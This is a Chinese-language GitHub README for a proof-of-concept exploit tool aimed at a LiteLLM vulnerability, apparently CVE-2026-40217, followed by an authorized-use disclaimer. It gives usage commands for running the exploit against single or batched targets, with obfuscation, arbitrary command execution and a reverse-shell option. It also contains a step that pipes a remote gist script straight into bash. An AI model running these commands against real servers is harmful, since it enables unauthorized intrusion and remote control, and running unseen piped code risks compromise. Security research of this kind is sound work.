HORKimhab/CVE-LiteLLM
GitHub: HORKimhab/CVE-LiteLLM
针对 LiteLLM 平台多个 CVE 漏洞的 PoC 利用工具,支持批量目标扫描、命令执行和反弹 Shell 等功能,用于授权安全研究与教育。
Stars: 0 | Forks: 0
# cve-id
## ⚡ 简单用法
仅在以下安全且已授权的环境中使用本项目:
- 本地虚拟机
- Docker 容器
- 隔离的实验室环境
- 授权的渗透测试环境
示例设置:
```
git clone
cd
# Project 使用 python 遵循以下步骤
# 创建一个虚拟环境
python -m venv venv
# 激活虚拟环境
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# 安装 requirments
pip install -r requirements.txt
```
示例用法:
```
# 帮助
python cve-2026-40217.py -h
# 单个目标 + reverse shell
python cve-2026-40217.py -t http://localhost:4000 -k "sk-..." --revshell --obfuscate 2
# 多个目标 + 混淆
python cve-2026-40217.py -f targets.txt -k "sk-..." --obfuscate 3 -c "whoami; id"
# 使用自定义线程
python cve-2026-40217.py -f targets.txt -k "sk-..." --threads 10
```
注意:
- 如果从其他项目 clone,您必须运行 `curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y` 来清除嵌套的 dir `.git`
## 鸣谢或参考
- https://thehackernews.com/2026/06/litellm-vulnerability-chain-lets-low.html
- CVE-2026-40217-PoC-learner202649: https://github.com/learner202649/CVE-2026-40217-PoC
# 📚 教育性安全研究仓库
一个用于在受控环境中学习、测试和研究网络安全概念的仓库。
## ⚠️ 安全与法律免责声明
## 目的
本仓库仅供**教育和授权的安全研究使用**。
它旨在帮助用户学习:
- 安全漏洞
- 沙箱与隔离概念
- 安全编码与防御实践
## 仅限授权使用
仅在您已获得许可的环境中使用本仓库,例如:
- 个人实验室或虚拟机
- Docker 或隔离环境
- 授权的渗透测试
- 网络安全培训或学术研究
严禁未经授权或非法使用。
## 免责声明
使用本仓库即表示您同意:
- 您需对自己的行为负责
- 您将合法且符合道德地使用它
- 本项目按“原样”提供,**不提供任何担保**
## 道德使用
本项目旨在用于:
- 防御性安全研究
- 网络安全教育
- 漏洞意识培养
- 安全系统与软件研究
## 联系方式
如需进行负责任的漏洞披露或合作,请通过 GitHub 联系仓库维护者。
标签:威胁模拟, 请求拦截, 逆向工具